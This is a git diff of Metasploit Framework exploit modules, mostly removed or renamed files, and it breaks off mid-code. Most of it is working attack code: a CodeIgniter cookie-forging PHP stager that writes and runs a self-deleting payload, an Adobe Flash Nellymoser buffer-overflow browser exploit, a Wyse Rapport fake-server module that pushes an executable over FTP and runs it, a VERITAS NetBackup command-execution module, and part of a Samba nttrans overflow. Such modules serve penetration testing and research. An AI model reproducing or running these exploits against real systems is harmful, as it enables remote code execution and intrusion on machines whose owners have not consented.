||||
else
|
||||
fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.")
|
||||
end
|
||||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
|
||||
fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.")
|
||||
end
|
||||
|
||||
print_good("Host configuration extracted.")
|
||||
vprint_status("Host configuration: #{host_config}")
|
||||
|
||||
# Step 4 - replace the host device description with a custom payload that can
|
||||
# be used for LFI. We have to keep the payload small because of size limitations
|
||||
# and we can't put anything in with '$' in it. So we need to make a simple install
|
||||
# payload which will write a required payload to disk that can be executes directly
|
||||
# as the last part of the payload. This will also be self-deleting.
|
||||
param_id = rand_text_alphanumeric(3)
|
||||
|
||||
# There are no files on the target file system that start with an underscore
|
||||
# so to allow for a small file size that doesn't collide with an existing file
|
||||
# we'll just prefix it with an underscore.
|
||||
payload_file = "_#{rand_text_alphanumeric(3)}.php"
|
||||
|
||||
installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));"
|
||||
stager = Rex::Text.encode_base64(installer)
|
||||
stager = xml_encode("<?php eval(base64_decode('#{stager}')); ?>")
|
||||
vprint_status("Stager: #{stager}")
|
||||
|
||||
# Butcher the XML directly rather than attempting to use REXML. The target XML
|
||||
# parser is way to simple/flaky to deal with the proper stuff that REXML
|
||||
# spits out.
|
||||
desc_start = host_config.index('" description="') + 15
|
||||
desc_end = host_config.index('"', desc_start)
|
||||
xml_payload = host_config[0, desc_start] +
|
||||
stager + host_config[desc_end, host_config.length]
|
||||
vprint_status(xml_payload)
|
||||
|
||||
# Step 5 - set the host description to the stager so that it is written to disk
|
||||
print_status("Uploading stager ...")
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
|
||||
'method' => 'POST',
|
||||
'headers' => {
|
||||
'Accept' => 'text/html'
|
||||
},
|
||||
'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
|
||||
'vars_get' => {
|
||||
'_' => config_time
|
||||
},
|
||||
'vars_post' => {
|
||||
'general_setup' => xml_payload
|
||||
}
|
||||
)
|
||||
|
||||
unless res && res.code == 200
|
||||
fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).")
|
||||
end
|
||||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
|
||||
fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).")
|
||||
end
|
||||
|
||||
print_good("Stager uploaded.")
|
||||
|
||||
# Step 6 - Invoke the stage, passing in a self-deleting php script body.
|
||||
print_status("Executing stager ...")
|
||||
payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00")
|
||||
payload_cookie_value = encode_cookie(payload_php_object)
|
||||
self_deleting_payload = "<?php unlink(__FILE__);\r\n#{payload.encoded}; ?>"
|
||||
errored = false
|
||||
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri),
|
||||
'method' => 'POST',
|
||||
'headers' => {
|
||||
'Accept' => 'text/html'
|
||||
},
|
||||
'cookie' => "#{datastore['COOKIEID']}=#{payload_cookie_value}",
|
||||
'vars_post' => {
|
||||
param_id => Rex::Text.encode_base64(self_deleting_payload)
|
||||
}
|
||||
)
|
||||
|
||||
if res && res.code == 200
|
||||
print_good("Stager execution succeeded, payload ready for execution.")
|
||||
else
|
||||
print_error("Stager execution failed (invalid result).")
|
||||
errored = true
|
||||
end
|
||||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
|
||||
print_error("Stager execution failed (unable to establish connection).")
|
||||
errored = true
|
||||
end
|
||||
|
||||
# Step 7 - try to restore the previous configuration, allowing exceptions
|
||||
# to bubble up given that we're at the end. This step is important because
|
||||
# we don't want to leave a trail of junk on disk at the end.
|
||||
print_status("Restoring host config ...")
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
|
||||
'method' => 'POST',
|
||||
'headers' => {
|
||||
'Accept' => 'text/html'
|
||||
},
|
||||
'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
|
||||
'vars_get' => {
|
||||
'_' => config_time
|
||||
},
|
||||
'vars_post' => {
|
||||
'general_setup' => host_config
|
||||
}
|
||||
)
|
||||
|
||||
# Step 8 - invoke the installed payload, but only if all went to plan.
|
||||
unless errored
|
||||
print_status("Executing payload at #{normalize_uri(target_uri, payload_file)} ...")
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri, payload_file),
|
||||
'method' => 'GET',
|
||||
'headers' => {
|
||||
'Accept' => 'text/html'
|
||||
},
|
||||
'cookie' => "#{datastore['COOKIEID']}=#{payload_cookie_value}"
|
||||
)
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Take a CodeIgnitor cookie and pull out the PHP object using the XOR
|
||||
# key that we've been given.
|
||||
#
|
||||
def decode_cookie(cookie_content)
|
||||
cookie_value = Rex::Text.decode_base64(URI.decode(cookie_content))
|
||||
pass = xor(cookie_value, datastore['XORKEY'])
|
||||
result = ''
|
||||
|
||||
(0...pass.length).step(2).each do |i|
|
||||
result << (pass[i].ord ^ pass[i + 1].ord).chr
|
||||
end
|
||||
|
||||
result
|
||||
end
|
||||
|
||||
#
|
||||
# Take a serialised PHP object cookie value and encode it so that
|
||||
# CodeIgniter thinks it's legit.
|
||||
#
|
||||
def encode_cookie(cookie_value)
|
||||
rand = Rex::Text.sha1(rand_text_alphanumeric(40))
|
||||
|
||||
block = ''
|
||||
|
||||
(0...cookie_value.length).each do |i|
|
||||
block << rand[i % rand.length]
|
||||
block << (rand[i % rand.length].ord ^ cookie_value[i].ord).chr
|
||||
end
|
||||
|
||||
cookie_value = xor(block, datastore['XORKEY'])
|
||||
cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value))
|
||||
vprint_status("Cookie value: #{cookie_value}")
|
||||
|
||||
cookie_value
|
||||
end
|
||||
|
||||
#
|
||||
# XOR a value against a key. The key is cycled.
|
||||
#
|
||||
def xor(string, key)
|
||||
result = ''
|
||||
|
||||
string.bytes.zip(key.bytes.cycle).each do |s, k|
|
||||
result << (s ^ k)
|
||||
end
|
||||
|
||||
result
|
||||
end
|
||||
|
||||
#
|
||||
# Simple XML substitution because the target XML handler isn't really
|
||||
# full blown or smart.
|
||||
#
|
||||
def xml_encode(str)
|
||||
str.gsub(/</, '<').gsub(/>/, '>')
|
||||
end
|
||||
|
||||
end
|
|
@ -1,191 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser
|
||||
encoded audio inside a FLV video, as exploited in the wild on June 2015. This module
|
||||
has been tested successfully on:
|
||||
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,
|
||||
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,
|
||||
Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,
|
||||
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and
|
||||
Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.
|
||||
Note that this exploit is effective against both CVE-2015-3113 and the
|
||||
earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression
|
||||
to the same root cause as CVE-2015-3043.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Unknown', # Exploit in the wild
|
||||
'juan vazquez' # msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2015-3043'],
|
||||
['CVE', '2015-3113'],
|
||||
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],
|
||||
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],
|
||||
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],
|
||||
['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],
|
||||
['URL', 'http://bobao.360.cn/learning/detail/357.html']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => ['win', 'linux'],
|
||||
'Arch' => [ARCH_X86],
|
||||
'BrowserRequirements' =>
|
||||
{
|
||||
:source => /script|headers/i,
|
||||
:arch => ARCH_X86,
|
||||
:os_name => lambda do |os|
|
||||
os =~ OperatingSystems::Match::LINUX ||
|
||||
os =~ OperatingSystems::Match::WINDOWS_7 ||
|
||||
os =~ OperatingSystems::Match::WINDOWS_81
|
||||
end,
|
||||
:ua_name => lambda do |ua|
|
||||
case target.name
|
||||
when 'Windows'
|
||||
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
|
||||
when 'Linux'
|
||||
return true if ua == Msf::HttpClients::FF
|
||||
end
|
||||
|
||||
false
|
||||
end,
|
||||
:flash => lambda do |ver|
|
||||
case target.name
|
||||
when 'Windows'
|
||||
return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161')
|
||||
return true if ver =~ /^17\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169')
|
||||
when 'Linux'
|
||||
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457')
|
||||
end
|
||||
|
||||
false
|
||||
end
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows',
|
||||
{
|
||||
'Platform' => 'win'
|
||||
}
|
||||
],
|
||||
[ 'Linux',
|
||||
{
|
||||
'Platform' => 'linux'
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Jun 23 2015',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
@swf = create_swf
|
||||
@flv = create_flv
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
def on_request_exploit(cli, request, target_info)
|
||||
print_status("Request: #{request.uri}")
|
||||
|
||||
if request.uri =~ /\.swf$/
|
||||
print_status('Sending SWF...')
|
||||
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
|
||||
return
|
||||
end
|
||||
|
||||
if request.uri =~ /\.flv$/
|
||||
print_status('Sending FLV...')
|
||||
send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
|
||||
return
|
||||
end
|
||||
|
||||
print_status('Sending HTML...')
|
||||
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
|
||||
end
|
||||
|
||||
def exploit_template(cli, target_info)
|
||||
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
|
||||
target_payload = get_payload(cli, target_info)
|
||||
b64_payload = Rex::Text.encode_base64(target_payload)
|
||||
os_name = target_info[:os_name]
|
||||
|
||||
if target.name =~ /Windows/
|
||||
platform_id = 'win'
|
||||
elsif target.name =~ /Linux/
|
||||
platform_id = 'linux'
|
||||
end
|
||||
|
||||
html_template = %Q|<html>
|
||||
<body>
|
||||
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
|
||||
<param name="movie" value="<%=swf_random%>" />
|
||||
<param name="allowScriptAccess" value="always" />
|
||||
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
|
||||
<param name="Play" value="true" />
|
||||
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
|
||||
</object>
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
|
||||
return html_template, binding()
|
||||
end
|
||||
|
||||
def create_swf
|
||||
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')
|
||||
swf = ::File.open(path, 'rb') { |f| swf = f.read }
|
||||
|
||||
swf
|
||||
end
|
||||
|
||||
def create_flv
|
||||
header = ''
|
||||
header << 'FLV' # signature
|
||||
header << [1].pack('C') # version
|
||||
header << [4].pack('C') # Flags: TypeFlagsAudio
|
||||
header << [9].pack('N') # DataOffset
|
||||
|
||||
data = ''
|
||||
data << "\x68" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0
|
||||
data << "\xee" * 0x440 # SoundData
|
||||
|
||||
tag1 = ''
|
||||
tag1 << [8].pack('C') # TagType (audio)
|
||||
tag1 << "\x00\x04\x41" # DataSize
|
||||
tag1 << "\x00\x00\x1a" # TimeStamp
|
||||
tag1 << [0].pack('C') # TimeStampExtended
|
||||
tag1 << "\x00\x00\x00" # StreamID, always 0
|
||||
tag1 << data
|
||||
|
||||
body = ''
|
||||
body << [0].pack('N') # PreviousTagSize
|
||||
body << tag1
|
||||
body << [0xeeeeeeee].pack('N') # PreviousTagSize
|
||||
|
||||
flv = ''
|
||||
flv << header
|
||||
flv << body
|
||||
|
||||
flv
|
||||
end
|
||||
end
|
|
@ -1,251 +0,0 @@
|
|||
##
|
||||
# $Id: hagent_untrusted_hsdata.rb 10998 2010-11-11 22:43:22Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'timeout'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::FtpServer
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Wyse Rapport Hagent Fake Hserver Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits the Wyse Rapport Hagent service by pretending to
|
||||
be a legitimate server. This process involves starting both HTTP and
|
||||
FTP services on the attacker side, then contacting the Hagent service of
|
||||
the target and indicating that an update is available. The target will
|
||||
then download the payload wrapped in an executable from the FTP service.
|
||||
},
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'Author' => 'kf',
|
||||
'Version' => '$Revision: 10998 $',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2009-0695'],
|
||||
['OSVDB', '55839'],
|
||||
['US-CERT-VU', '654545'],
|
||||
['URL', 'http://snosoft.blogspot.com/'],
|
||||
['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'],
|
||||
['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],
|
||||
['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2048,
|
||||
'BadChars' => '',
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XPe x86',{'Platform' => 'win',}],
|
||||
[ 'Wyse Linux x86', {'Platform' => 'linux',}],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jul 10 2009'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]),
|
||||
Opt::RPORT(80),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
|
||||
if(datastore['SRVPORT'].to_i != 21)
|
||||
print_error("This exploit requires the FTP service to run on port 21")
|
||||
return
|
||||
end
|
||||
|
||||
# Connect to the target service
|
||||
print_status("Connecting to the target")
|
||||
connect()
|
||||
|
||||
# Start the FTP service
|
||||
print_status("Starting the FTP server")
|
||||
start_service()
|
||||
|
||||
# Create the executable with our payload
|
||||
print_status("Generating the EXE")
|
||||
@exe_file = generate_payload_exe
|
||||
if target['Platform'] == 'win'
|
||||
maldir = "C:\\" # Windows
|
||||
malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe"
|
||||
co = "XP"
|
||||
elsif target['Platform'] == 'linux'
|
||||
maldir = "//tmp//" # Linux
|
||||
malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin"
|
||||
co = "LXS"
|
||||
end
|
||||
@exe_sent = false
|
||||
|
||||
# Start the HTTP service
|
||||
print_status("Starting the HTTP service")
|
||||
wdmserver = Rex::Socket::TcpServer.create({
|
||||
'Context' => {
|
||||
'Msf' => framework,
|
||||
'MsfExploit' => self
|
||||
}
|
||||
})
|
||||
|
||||
# Let this close automatically
|
||||
add_socket(wdmserver)
|
||||
|
||||
wdmserver_port = wdmserver.getsockname[2]
|
||||
print_status("Starting the HTTP service on port #{wdmserver_port}")
|
||||
|
||||
|
||||
fakerapport = Rex::Socket.source_address(rhost)
|
||||
fakemac = "00" + Rex::Text.rand_text(5).unpack("H*")[0]
|
||||
mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|"
|
||||
|
||||
# FTP Credentials
|
||||
ftpserver = Rex::Socket.source_address(rhost)
|
||||
ftpuser = Rex::Text.rand_text_alphanumeric(rand(8)+1)
|
||||
ftppass = Rex::Text.rand_text_alphanumeric(rand(8)+1)
|
||||
ftpport = 21
|
||||
ftpsecure = '0'
|
||||
|
||||
incr = 10
|
||||
pwn1 =
|
||||
"&UP0|&SI=1|UR=9" +
|
||||
"|CO \x0f#{co}\x0f|#{incr}" +
|
||||
# "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" +
|
||||
"|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}"
|
||||
|
||||
pwn2 = "|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}"
|
||||
|
||||
pwn3 =
|
||||
"|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
|
||||
# "|RB|#{incr+1}" +
|
||||
# "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" +
|
||||
#"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
|
||||
# FTP Paramaters
|
||||
"|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" +
|
||||
"|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" +
|
||||
"|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" +
|
||||
"|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" +
|
||||
# No clue
|
||||
"|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|"
|
||||
|
||||
if target['Platform'] == 'win'
|
||||
pwn = pwn1 + pwn3
|
||||
elsif target['Platform'] == 'linux'
|
||||
pwn = pwn1 + pwn2 + pwn3
|
||||
end
|
||||
# Send the malicious request
|
||||
sock.put(mal)
|
||||
|
||||
# Download some response data
|
||||
resp = sock.get_once(-1, 10)
|
||||
print_status("Received: #{resp}")
|
||||
|
||||
if not resp
|
||||
print_error("No reply from the target, this may not be a vulnerable system")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Waiting on a connection to the HTTP service")
|
||||
begin
|
||||
Timeout.timeout(190) do
|
||||
done = false
|
||||
while (not done and session = wdmserver.accept)
|
||||
req = session.recvfrom(2000)[0]
|
||||
next if not req
|
||||
next if req.empty?
|
||||
print_status("HTTP Request: #{req.split("\n")[0].strip}")
|
||||
|
||||
case req
|
||||
when /V01/
|
||||
print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)")
|
||||
res = pwn
|
||||
when /V02/
|
||||
print_status("++ device sending V02 query...")
|
||||
res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|"
|
||||
done = true
|
||||
|
||||
when /V55/
|
||||
print_status("++ device sending V55 query...")
|
||||
res = pwn
|
||||
when /POST/ # PUT is used for non encrypted requests.
|
||||
print_status("++ device sending V55 query...")
|
||||
res = pwn
|
||||
done = true
|
||||
else
|
||||
print_status("+++ sending generic response...")
|
||||
res = pwn
|
||||
end
|
||||
|
||||
print_status("Sending reply: #{res}")
|
||||
session.put(res)
|
||||
session.close
|
||||
end
|
||||
end
|
||||
rescue ::Timeout::Error
|
||||
print_status("Timed out waiting on the HTTP request")
|
||||
wdmserver.close
|
||||
disconnect()
|
||||
stop_service()
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Waiting on the FTP request...")
|
||||
stime = Time.now.to_f
|
||||
while(not @exe_sent)
|
||||
break if (stime + 90 < Time.now.to_f)
|
||||
select(nil, nil, nil, 0.25)
|
||||
end
|
||||
|
||||
if(not @exe_sent)
|
||||
print_status("No executable sent :(")
|
||||
end
|
||||
|
||||
stop_service()
|
||||
wdmserver.close()
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
def on_client_command_retr(c,arg)
|
||||
print_status("#{@state[c][:name]} FTP download request for #{arg}")
|
||||
conn = establish_data_connection(c)
|
||||
if(not conn)
|
||||
c.put("425 Can't build data connection\r\n")
|
||||
return
|
||||
end
|
||||
|
||||
c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
|
||||
conn.put(@exe_file)
|
||||
c.put("226 Transfer complete.\r\n")
|
||||
conn.close
|
||||
@exe_sent = true
|
||||
end
|
||||
|
||||
def on_client_command_size(c,arg)
|
||||
print_status("#{@state[c][:name]} FTP size request for #{arg}")
|
||||
c.put("213 #{@exe_file.length}\r\n")
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
|
@ -1,97 +0,0 @@
|
|||
##
|
||||
# $Id: veritas_netbackup_cmdexec.rb 10617 2010-10-09 06:55:52Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'VERITAS NetBackup Remote Command Execution',
|
||||
'Description' => %q{
|
||||
This module allows arbitrary command execution on an
|
||||
ephemeral port opened by Veritas NetBackup, whilst an
|
||||
administrator is authenticated. The port is opened and
|
||||
allows direct console access as root or SYSTEM from
|
||||
any source address.
|
||||
},
|
||||
'Author' => [ 'patrick' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 10617 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2004-1389' ],
|
||||
[ 'OSVDB', '11026' ],
|
||||
[ 'BID', '11494' ],
|
||||
[ 'URL', 'http://seer.support.veritas.com/docs/271727.htm' ],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Platform' => ['unix', 'win', 'linux'],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => '',
|
||||
'DisableNops' => true,
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic perl telnet',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic', { }],
|
||||
],
|
||||
'DisclosureDate' => 'Oct 21 2004',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
|
||||
sploit = rand_text_alphanumeric(10)
|
||||
buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\necho #{sploit}\n"
|
||||
|
||||
sock.put(buf)
|
||||
banner = sock.get(3,3)
|
||||
|
||||
disconnect
|
||||
|
||||
if (banner and banner =~ /#{sploit}/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
sploit = payload.encoded.split(" ")
|
||||
|
||||
buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\n"
|
||||
buf << payload.encoded
|
||||
buf << "\n"
|
||||
|
||||
sock.put(buf)
|
||||
res = sock.get(-1,3)
|
||||
|
||||
print_status("#{res}")
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
|
@ -5,7 +5,7 @@
|
|||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
|
@ -17,13 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser
|
||||
encoded audio inside a FLV video, as exploited in the wild on June 2015. This module
|
||||
has been tested successfully on:
|
||||
|
||||
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,
|
||||
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,
|
||||
Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,
|
||||
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and
|
||||
Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.
|
||||
|
||||
Note that this exploit is effective against both CVE-2015-3113 and the
|
||||
earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression
|
||||
to the same root cause as CVE-2015-3043.
|
||||
|
|
|
@ -1,153 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = AverageRanking
|
||||
|
||||
include Msf::Exploit::Remote::SMB::Client
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module attempts to exploit a buffer overflow vulnerability present in
|
||||
versions 2.2.2 through 2.2.6 of Samba.
|
||||
The Samba developers report this as:
|
||||
"Bug in the length checking for encrypted password change requests from clients."
|
||||
The bug was discovered and reported by the Debian Samba Maintainers.
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2002-1318' ],
|
||||
[ 'OSVDB', '14525' ],
|
||||
[ 'BID', '6210' ],
|
||||
[ 'URL', 'http://www.samba.org/samba/history/samba-2.2.7a.html' ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Platform' => 'linux',
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
'MinNops' => 512,
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ "Samba 2.2.x Linux x86",
|
||||
{
|
||||
'Arch' => ARCH_X86,
|
||||
'Platform' => 'linux',
|
||||
'Rets' => [0x01020304, 0x41424344],
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Apr 7 2003'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(139)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
# 0x081fc968
|
||||
|
||||
pattern = Rex::Text.pattern_create(12000)
|
||||
|
||||
pattern[532, 4] = [0x81b847c].pack('V')
|
||||
pattern[836, payload.encoded.length] = payload.encoded
|
||||
|
||||
# 0x081b8138
|
||||
|
||||
connect
|
||||
smb_login
|
||||
|
||||
targ_address = 0xfffbb7d0
|
||||
|
||||
#
|
||||
# Send a NTTrans request with ParameterCountTotal set to the buffer length
|
||||
#
|
||||
|
||||
subcommand = 1
|
||||
param = ''
|
||||
body = ''
|
||||
setup_count = 0
|
||||
setup_data = ''
|
||||
data = param + body
|
||||
|
||||
pkt = CONST::SMB_NTTRANS_PKT.make_struct
|
||||
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
|
||||
|
||||
base_offset = pkt.to_s.length + (setup_count * 2) - 4
|
||||
param_offset = base_offset
|
||||
data_offset = param_offset + param.length
|
